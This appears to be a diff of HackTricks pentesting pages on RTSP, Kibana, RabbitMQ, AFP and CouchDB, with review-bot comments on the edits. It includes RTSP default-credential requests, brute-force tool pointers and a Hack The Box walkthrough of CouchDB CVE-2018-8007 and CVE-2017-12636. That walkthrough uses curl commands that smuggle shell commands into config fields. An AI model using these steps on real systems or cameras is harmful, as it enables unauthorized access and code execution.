@@ -29,33 +29,23 @@ PORT STATE SERVICE 554/tcp open rtsp ``` -## Detailed Information +## Key Details -First and foremost RTSP is an HTTP like protocol. It has different structure and control commands but is textual in its format and once you learn the basics of the commands and how they interact, fairly easy to use. The specification for RTSP is pretty straightforward. Here is a link to it: +**RTSP** is similar to HTTP but designed specifically for media streaming. It's defined in a straightforward specification which can be found here: [RTSP – RFC2326](https://tools.ietf.org/html/rfc2326) -RTSP can be accessed unauthenticated (common in off-the-shelf devices) or authenticated. Authenticated access mirrors HTTP in that you have Basic and Digest authentication, both nearly identical to HTTP. To find out whether your device is authenticated or unauthenticated, simply send a “DESCRIBE” request. A simple DESCRIBE request looks like: +Devices might allow **unauthenticated** or **authenticated** access. To check, a "DESCRIBE" request is sent. A basic example is shown below: `DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` -Note: the additional “\r\n” is required for reliable response. Some systems will accept the single “\r\n” but most won’t. +Remember, the correct formatting includes a double "\r\n" for a consistent response. A "200 OK" response indicates **unauthenticated access**, while "401 Unauthorized" signals the need for authentication, revealing if **Basic** or **Digest authentication** is required. -This can be sent down a raw socket. Just like HTTP, a successful response indicating unauthenticated access is available will contain a “200 OK”. In this case with DESCRIBE, it will also contain all of the operational parameters of the video feed. - -If the device requires authentication, the the response back will contain “401 Unauthorized”. The response will also indicate what authentication mechanisms are available. 
If Basic authentication is available the response string will contain an information line that has “WWW-Authenticate: Basic”. The rest of the information provide with Basic authentication is largely irrelevant to actually conduct basic authentication. - -If Digest authentication is required, then the “401 Unauthorized” response will have an information line containing “WWW-Authenticate: Digest”. The information with the Digest specification IS very important if you are going to do Digest authentication, so don’t ignore it. - -Basic authentication is the way to go, hopefully the response received indicates that it is available. If not there are three different methods to assemble a Digest authentication element, so Digest can become troublesome, especially blind (unauthenticated). The rest of this article will stick with Basic authentication. I may write a follow-up article later once I decipher the secret sauce to doing Digest authentication blind. - -To formulate a Basic authentication element, one simple has to base 64 encode \ “:” \ and add it to the request. So a new request would look like: +For **Basic authentication**, you encode the username and password in base64 and include it in the request like so: `DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` -Again note the request is terminated with the double “\r\n”. - -The value YWRtaW46MTIzNA== is the base 64 encoded username and password concatenated with “:”. In this case I have used “admin”/”1234”. Some simple python scripting to try this out looks like: +This example uses "admin" and "1234" for the credentials. Here's a **Python script** to send such a request: ```python import socket 
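Review bot: in the RTSP hunk the new text says "the correct formatting includes a double "\r\n"", yet both example requests still end with a single `\r\n` (`DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\n`), so the examples contradict the instruction; terminate them with `\r\n\r\n`, the empty line being what ends the request header in an HTTP-style protocol. The request URL has also lost its host and port placeholders (it reads `rtsp://:`) in the old and new lines alike; restore them as `rtsp://<ip>:<port>` with the brackets escaped. "Remember, the correct formatting..." is a change of register from the rest of the page; "Note: the request must end with a double \r\n" is enough.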
@@ -67,9 +57,10 @@ data = s.recv(1024) print(data) ``` -Voila! You have access. +**Basic authentication** is simpler and preferred. **Digest authentication** requires careful handling of the authentication details provided in the "401 Unauthorized" response. + +This overview simplifies the process of accessing RTSP streams, focusing on **Basic authentication** for its simplicity and practicality in initial attempts. -**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) ## Enumeration @@ -85,9 +76,7 @@ nmap -sV --script "rtsp-*" -p To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) -**Cameradar** - -Cameradar allows you to: +[**Cameradar**](https://github.com/Ullaakut/cameradar) * Detect open RTSP hosts on any accessible target * Get their public info (hostname, port, camera model, etc.) @@ -96,6 +85,10 @@ Cameradar allows you to: * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Try to create a Gstreamer pipeline to check if they are properly encoded * Print a summary of all the informations Cameradar could get + +## References +* [https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol) +* [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
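Review bot: the `-**From:** ...` line removed here linked the web.archive.org snapshot (`https://web.archive.org/web/20161020202643/http://badguyfu.net/...`), while the replacement bullet added under `## References` in the last hunk links the bare `http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/`; an archive URL is used precisely when the live page cannot be relied on, so keep the archived link in the reference. The added "This overview simplifies the process of accessing RTSP streams..." sentence is summary filler and can go. In the Cameradar hunk, replacing "Cameradar allows you to:" with a bare link leaves the bullet list ("* Detect open RTSP hosts...") without its introducing sentence; keep "Cameradar allows you to:" after the link.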
diff --git a/network-services-pentesting/5555-android-debug-bridge.md b/network-services-pentesting/5555-android-debug-bridge.md index de8e38ec8..671bfd17b 100644 --- a/network-services-pentesting/5555-android-debug-bridge.md +++ b/network-services-pentesting/5555-android-debug-bridge.md @@ -16,7 +16,9 @@ Other ways to support HackTricks: ## Basic Information -**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb)) +From [the docs](https://developer.android.com/studio/command-line/adb): + +**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. **Default port**: 5555. diff --git a/network-services-pentesting/5601-pentesting-kibana.md b/network-services-pentesting/5601-pentesting-kibana.md index b6f7293af..e922ebc8e 100644 --- a/network-services-pentesting/5601-pentesting-kibana.md +++ b/network-services-pentesting/5601-pentesting-kibana.md 
@@ -17,25 +17,23 @@ Other ways to support HackTricks: # Basic Information -Kibana provides search and data visualization capabilities for data indexed in Elasticsearch. The service runs per default on port **5601**. Kibana also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster. +Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. -## Authentication? +## Understanding Authentication -Authentication in Kibana is linked to the **credentials from** [**Elasticsearch**](9200-pentesting-elasticsearch.md). If **authentication** is **disabled** in **Elasticsearch**, **Kibana** also should be **accessible without credentials**. Otherwise the **same credentials valid for Elasticsearch** should be working when logging in to Kibana. The **rights** of the **users** in **Elasticsearch** are the **same** as in **Kibana**. +The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. -You might find credentials in the configuration file **/etc/kibana/kibana.yml**. If those credentials are not for the user **kibana\_system**, it should be tried to use them for accessing further data. 
They could have more rights then the **kibana\_system** user, which only has access to the monitoring API and the **.kibana** index. +## Actions Upon Access -## Having Access? +Once access to Kibana is secured, several actions are advisable: -When having access to Kibana you can do several things: +- Exploring data from Elasticsearch should be a priority. +- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. +- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). -* Try to **access data** from **Elasticsearch** -* Check if you can access the users panel and if you can e**dit, delete or create new users,** roles or API Keys (Stack Management -> Users/Roles/API Keys) -* Check the current version for vulnerabilities (**There was a RCE vulnerability in 2019 for Kibana versions < 6.6.0** \[[2](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)]) +## SSL/TLS Considerations -## Enabled SSL/TLS? - -If SSL/TLS is not enabled, it should be evaluated, whether sensitive information can be leaked. +In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s ## References diff --git a/network-services-pentesting/5671-5672-pentesting-amqp.md b/network-services-pentesting/5671-5672-pentesting-amqp.md index b25b529d7..673ae6800 100644 --- a/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/network-services-pentesting/5671-5672-pentesting-amqp.md 
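Review bot: the new line `+In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s` carries a stray trailing "s". "Once access to Kibana is secured, several actions are advisable" reads as if Kibana had been hardened; "obtained" is the intended word. The removed bullet dated the RCE ("in 2019") while the new one only gives "versions prior to 6.6.0"; keeping the year helps readers match it to the linked advisory.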
@@ -16,9 +16,11 @@ Other ways to support HackTricks: ## Basic Information -**RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ -A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ -Definition from [here](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html). +From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): + +> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ +> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ +Definition from . **Default port**: 5672,5671 
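Review bot: the quoted definition ends with the dangling line `+Definition from .`: the link was moved into the new `From [cloudamqp](...)` lead-in, but the sentence stub was left behind, and because it is not prefixed with `> ` it also breaks out of the blockquote and renders as body text. Delete that line.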
@@ -69,7 +71,7 @@ PORT STATE SERVICE VERSION ## Other RabbitMQ ports -From [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: +In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: * **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md). * **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). diff --git a/network-services-pentesting/584-pentesting-afp.md b/network-services-pentesting/584-pentesting-afp.md index e1e6633fd..14f900e39 100644 --- a/network-services-pentesting/584-pentesting-afp.md +++ b/network-services-pentesting/584-pentesting-afp.md @@ -14,30 +14,33 @@ Other ways to support HackTricks:
+ ## Basic Information -The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported\*\*.\*\* AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services. +The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within the **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and sophisticated file locking mechanisms. It was the main protocol for file services in Mac OS 9 and earlier versions. 
-**Default port:** 548 +**Default Port:** 548 -``` +```bash PORT STATE SERVICE 548/tcp open afp ``` -## Enumeration +### **Enumeration** + +For the enumeration of AFP services, the following commands and scripts are useful: ```bash msf> use auxiliary/scanner/afp/afp_server_info nmap -sV --script "afp-* and not dos and not brute" -p ``` -| **Name** | **Description** | -| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------ | -| afp-ls | Lists available AFP volumes and files | -| afp-path-vuln | Lists all AFP volumes and files[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48) | -| afp-serverinfo | Displays AFP server information | -| afp-showmount | Lists available AFP shares and respective ACLs | +**Scripts and Their Descriptions:** + +- **afp-ls**: This script is utilized to list the available AFP volumes and files. +- **afp-path-vuln**: It lists all AFP volumes and files, highlighting potential vulnerabilities. +- **afp-serverinfo**: This provides detailed information about the AFP server. +- **afp-showmount**: It lists available AFP shares along with their respective ACLs. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp) diff --git a/network-services-pentesting/5984-pentesting-couchdb.md b/network-services-pentesting/5984-pentesting-couchdb.md index c2544c56a..c17e51e80 100644 --- a/network-services-pentesting/5984-pentesting-couchdb.md +++ b/network-services-pentesting/5984-pentesting-couchdb.md 
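Review bot: heading level regression in the AFP hunk: `## Enumeration` becomes `### **Enumeration**`, which demotes it to a child of Basic Information and makes it a sibling of the following `### [**Brute Force**]` heading that previously sat beneath it; keep `## Enumeration` and drop the bold, which is redundant inside a heading. Minor: the table-to-list conversion loses the reference link that the `afp-path-vuln` row carried, and "highlighting potential vulnerabilities" is vaguer than the original description; restore the original wording and its link.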
@@ -16,9 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -CouchDB is a document-oriented database and within each document fields are stored as key-value maps. Fields can be either a simple key/value pair, list, or map. +**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval. -Each document that is stored in the database is given a document-level unique identifier (`_id`) as well as a revision (`_rev`) number for each change that is made and saved to the database. +Every **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document level. Additionally, each modification made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows for efficient **tracking and management of changes**, facilitating easy retrieval and synchronization of data within the database. **Default port:** 5984(http), 6984(https) 
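Review bot: the rewritten CouchDB Basic Information paragraphs add evaluative filler ("versatile and powerful", "providing flexibility in data storage and retrieval", "facilitating easy retrieval and synchronization") that the removed text did not claim and that adds nothing for a pentesting reference. Keep the facts (fields are key/value pairs, lists or maps; each document gets an `_id` and a `_rev` per saved change) in the shorter original form, with bold on `_id`/`_rev` if emphasis is wanted.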
@@ -58,8 +58,8 @@ Note that if accessing the root of couchdb you receive a `401 Unauthorized` with These are the endpoints where you can access with a **GET** request and extract some interesting info. You can find [**more endpoints and more detailed descriptions in the couchdb documentation**](https://docs.couchdb.org/en/latest/api/index.html). * **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID. -* \*\*`/_all_dbs`\*\*Returns a list of all the databases in the CouchDB instance. -* \*\*`/_cluster_setup`\*\*Returns the status of the node or cluster, per the cluster setup wizard. +* **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance. +* **`/_cluster_setup`**Returns the status of the node or cluster, per the cluster setup wizard. * **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The existence of the `_global_changes` database is required to use this endpoint. * **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The field `all_nodes` displays all nodes this node knows about, including the ones that are part of the cluster. * **`/_scheduler/jobs`** List of replication jobs. Each job description will include source and target information, replication id, a history of recent event, and a few other things. 
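Review bot: inconsistent spacing in the endpoint list hunk: `**`/_all_dbs`** Returns` gains the space after the closing bold but `**`/_cluster_setup`**Returns` does not, so the two bullets render differently; add the space to `_cluster_setup` as well, as every other bullet in the list has it.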
@@ -71,8 +71,8 @@ These are the endpoints where you can access with a **GET** request and extract * **`/_node/{node-name}/_system`** The \_systemresource returns a JSON object containing various system-level statistics for the running server\_.\_ You can use \_\_`_local` as {node-name} to get current node info. * **`/_node/{node-name}/_restart`** * **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) is `true` or `nolb`, the endpoint will return a 404 response. -* \*\*`/_uuids`\*\*Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. -* \*\*`/_reshard`\*\*Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. +* **`/_uuids`**Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. +* **`/_reshard`**Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) 
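Review bot: same spacing issue as the first endpoint-list hunk: `**`/_uuids`**Requests` and `**`/_reshard`**Returns` are missing the space after the closing `**`, so the escaped `\*\*` is fixed but the descriptions still render glued to the code span; add the space.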
@@ -149,19 +149,13 @@ curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[] ## CouchDB RCE -### Erlang Cookie +### **Erlang Cookie Security Overview** -In the CouchDB docs, in the [cluster set-up section](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup), it talks about the different ports used by CouchDB: +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -> CouchDB in cluster mode uses the port `5984` just as standalone, but it also uses `5986` for node-local APIs. -> -> Erlang uses TCP port `4369` (EPMD) to find other nodes, so all servers must be able to speak to each other on this port. In an Erlang Cluster, all nodes are connected to all other nodes. A mesh. +In the CouchDB documentation, specifically in the section concerning cluster set-up ([link](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port `5984` is used. Additionally, port `5986` is for node-local APIs, and importantly, Erlang requires TCP port `4369` for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node. -And then there’s an interesting warning: - -![1536931232858](https://0xdf.gitlab.io/img/1536931232858.png) - -If we look in the process list, we can see that cookie, “monster”: +A crucial security advisory is highlighted regarding port `4369`. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework. ``` www-data@canape:/$ ps aux | grep couchdb 
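Review bot: the Erlang Cookie rewrite loses the point of the section. The removed text quoted the docs, pointed at the warning, and then said directly that the cookie value ("monster") can be read from the process list; the replacement says the cookie "might be observed, indicating its operational role in the system's security framework", which no longer tells the reader that the problem is a secret passed on the command line and therefore visible in `ps aux` output. Suggest closing the paragraph with something like: "The cookie is the only thing protecting the node once port 4369 is reachable, and in the process list below it is passed as a command-line argument, so anyone who can list processes can read it." The added "Example [from here]" attribution is good; the rename to "Erlang Cookie Security Overview" is unnecessary, the old `### Erlang Cookie` is the clearer section title.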
@@ -170,182 +164,108 @@ root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /va homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b ``` -**You can**[ **read this section to learn how to abuse Erlangs cookies to obtain RCE**](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.**\ -Also, you can read some **Canape HTB machine writeup** [**like this one**](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) to see and **practice** how to **exploit this vuln**. +For those interested in understanding how this "cookie" can be exploited for Remote Code Execution (RCE) within the context of Erlang systems, a dedicated section is available for further reading. It details the methodologies for leveraging Erlang cookies in unauthorized manners to achieve control over systems. You can **[explore the detailed guide on abusing Erlang cookies for RCE here](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. -### **Successful CVE-2018-8007 with local.ini write permissions** +### **Exploiting CVE-2018-8007 through Modification of local.ini** -In writing this post, I found a new CVE had been released for CouchDB from mdsec, [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). It also requires writes to the `local.ini` file, so it isn’t a useful option for Canape. But since I’ve already made it writable as root, let’s see if we can get it to work. +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -Start with a clean and now writable `local.ini` (and a backup): +A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the `local.ini` file. 
Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the `local.ini` file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process. -``` +First, the environment is prepared by ensuring the `local.ini` file is writable, verified by listing the permissions: + +```bash root@canape:/home/homer/etc# ls -l -total 40 -r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini -rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini -r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk -r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args ``` -We can use curl to modify the origins in the `local.ini` file. The vulnerability here is that if we use curl to put a new origin and then newlines, we can write additional stuff, including a new header and details. So we’ll take advantage of the `[os_daemons]` field, and add a process for CouchDB to try to keep running: +To exploit the vulnerability, a curl command is executed, targeting the `cors/origins` configuration in `local.ini`. This injects a new origin along with additional commands under the `[os_daemons]` section, aiming to execute arbitrary code: ```bash www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf" ``` -In the root shell, we can see what changes: +Subsequent verification shows the injected configuration in `local.ini`, contrasting it with a backup to highlight the changes: -``` +```bash root@canape:/home/homer/etc# diff local.ini local.ini.bk 119,124d118 -< < [cors] < origins = 0xdf -< < [os_daemons] < test_daemon = /usr/bin/touch /tmp/0xdf ``` -And yet, the file isn’t there: +Initially, the expected file (`/tmp/0xdf`) does not exist, indicating that the injected command has not been executed yet. 
Further investigation reveals that processes related to CouchDB are running, including one that could potentially execute the injected command: -``` -root@canape:/home/homer/etc# ls /tmp/0xdf -ls: cannot access '/tmp/0xdf': No such file or directory -``` - -If we look at the processes running with “couchdb” in the cmdline, we see not only the line command line that gives us the cookie value we used earlier, but also `runsrv couchdb`: - -``` +```bash root@canape:/home/homer/bin# ps aux | grep couch -root 711 0.0 0.0 4240 696 ? Ss 14:28 0:00 runsv couchdb -root 728 0.0 0.0 4384 812 ? S 14:28 0:00 svlogd -tt /var/log/couchdb -homer 1785 0.8 3.1 638992 31248 ? Sl 17:55 0:01 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/bin/.. -progname couchdb -- -home /home/homer -- -boot /home/homer/bi -n/../releases/2.0.0/couchdb -name couchdb@localhost -setcookie monster -kernel error_logger silent -sasl sasl_error_logger false -noshell -noinput -config /home/homer/bin/../releases/2.0.0/sys.config ``` -If we kill that process, it comes right back (notice the new pid): +By terminating the identified CouchDB process and allowing the system to automatically restart it, the execution of the injected command is triggered, confirmed by the existence of the previously missing file: -``` +```bash root@canape:/home/homer/etc# kill 711 -root@canape:/home/homer/etc# ps aux | grep runsrv -root 2031 0.0 0.0 14224 980 pts/2 S+ 18:09 0:00 grep --color=auto runsrv -``` - -And, on restart, runs the OS\_Daemons: - -``` root@canape:/home/homer/etc# ls /tmp/0xdf /tmp/0xdf ``` -### **Successful Attempt Via CVE-2017-12636 with local.ini write permissions** +This exploration confirms the viability of CVE-2018-8007 exploitation under specific conditions, notably the requirement for writable access to the `local.ini` file. The provided code examples and procedural steps offer a clear guide for replicating the exploit in a controlled environment. 
-CVE-2017-12636 allows for code execution through the couchdb process. However, it won’t work in this configuration. +For more details on CVE-2018-8007, refer to the advisory by mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). -There are a few POCs out there as reference: +### **Exploring CVE-2017-12636 with Write Permissions on local.ini** -* [https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) -* [https://www.exploit-db.com/exploits/44913/](https://www.exploit-db.com/exploits/44913/) +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -We’d need to write a new query\_server, and then invoke that. When Canape was released, most of the POCs were for couchdb 1.x, but this box is running 2, so the query\_servers path from most of the POCs doesn’t exist. That’s changed now, but we’ll walk the same steps. First, get the version, and show that the 1.X path doesn’t exist: +A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. 
The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path: ```bash -www-data@canape:/var/www/git$ curl http://localhost:5984 -{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} - -www-data@canape:/var/www/git$ curl http://0xdf:df@localhost:5984/_config/query_servers/ -{"error":"not_found","reason":"Database does not exist."} +curl http://localhost:5984 +curl http://0xdf:df@localhost:5984/_config/query_servers/ ``` -Update with the new path for 2.0: +To accommodate CouchDB version 2.0, a new path is utilized: ```bash -www-data@canape:/var/www/git$ curl 'http://0xdf:df@localhost:5984/_membership' -{"all_nodes":["couchdb@localhost"],"cluster_nodes":["couchdb@localhost"]} - -www-data@canape:/var/www/git$ curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers -{"coffeescript":"./bin/couchjs ./share/server/main-coffee.js","javascript":"./bin/couchjs ./share/server/main.js"} +curl 'http://0xdf:df@localhost:5984/_membership' +curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers ``` -From there, we should add a query\_server and then invoke it, but we aren’t able to. 
+Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output: ```bash -www-data@canape:/var/www/git$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -{"error":"badmatch","reason":"{badrpc,{'EXIT',{{{badmatch,{error,eacces}},\n [{config_writer,save_to_file,2,\n [{file,\"src/config_writer.erl\"},{line,38}]},\n {config,handle_call,3,[{file,\"src/config.erl\"},{line,222}]},\n {gen_server,try_handle_call,4,\n [{file,\"gen_server.erl\"},{line,629}]},\n {gen_server,handle_msg,5,\n [{file,\"gen_server.erl\"},{line,661}]},\n {proc_lib,init_p_do_apply,3,\n [{file,\"proc_lib.erl\"},{line,240}]}]},\n {gen_server,call,\n [config,\n {set,\"query_servers\",\"cmd\",\n \"/sbin/ifconfig > /tmp/df\",true,nil}]}}}}","ref":1617834159} +curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` -Some Googling shows that this is an issue with permissions. In fact, if we check with out root shell, we can see that the `local.ini` file is not writable by anyone, let alone www-data: - -``` -root@canape:/home/home/etc# ls -ls local.ini -8 -r--r--r-- 1 homer homer 4841 Sep 14 17:11 local.ini -``` - -So that’s a dead end for Canape. But if we want to try to get it working, we can make it readable with our root or homer access, and continue down this path. We’ll make a backup of the original so we can see what changes: - -``` -root@canape:/# cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b -root@canape:/# chmod 666 /home/homer/etc/local.ini -``` - -Now, back to our www-data shell: +Further investigation revealed permission issues with the `local.ini` file, which was not writable. 
By modifying the file permissions with root or homer access, it became possible to proceed: ```bash -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -"" +cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b +chmod 666 /home/homer/etc/local.ini ``` -``` -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -"" -``` - -We get back the previous value for the cmd query server, which means success. And in the root shell, we can see it worked: - -``` -root@canape:/home/homer/etc# diff local.ini local.ini.bk -48c48 -< cmd = /sbin/ifconfig > /tmp/df ---- -> cmd = -``` - -Now, we should be able to create a db, and then a document in that db, and the request it with a view that maps our query\_server to get execution. - -Create db and document: +Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. 
